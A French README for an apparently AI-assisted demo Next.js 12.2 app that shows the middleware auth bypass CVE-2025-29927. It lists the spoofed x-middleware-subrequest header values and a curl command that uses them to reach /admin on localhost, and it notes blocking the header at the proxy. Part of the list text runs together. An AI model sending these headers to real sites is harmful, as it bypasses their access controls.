
🔓 Next.js Auth Bypass Demo - Application éducative démontrant la vulnérabilité de contournement d'authentification middleware CVE-2025-29927 . ⚠️ À usage éducatif uniquement. [Fait en utilisant l'IA]
Une simple application de preuve de concept Next.js 12.2.
npm install
npm run dev
L'application sera disponible à l'adresse http://localhost:3000
npm run dev - Lancer le serveur de développementnpm run build - Construire pour la productionnpm run start - Lancer le serveur de productionModifiez pages/index.js pour modifier la page Hello World. L'application utilise des styles en ligne pour simplifier, mais vous pouvez ajouter des fichiers CSS ou des bibliothèques de style selon vos besoins.
Cette application démontre la vulnérabilité CVE-2025-29927 découverte par Rachid.A (zhero) et Yasser Allam (inzo_) :
x-middleware-subrequestadminadminx-middleware-subrequest: middlewarecurl -H "x-middleware-subrequest: middleware" http://localhost:3000/adminx-middleware-subrequest: middlewarex-middleware-subrequest: src/middlewarex-middleware-subrequest: middleware:middleware:middleware:middleware:middlewarex-middleware-subrequest au niveau du proxy/CDN⚠️ AVERTISSEMENT : Ceci démontre une vraie CVE à des fins éducatives uniquement !
Cette application utilise des styles en ligne pour simplifier. Pour une application en production, envisagez d'utiliser :
Bon code ! 🚀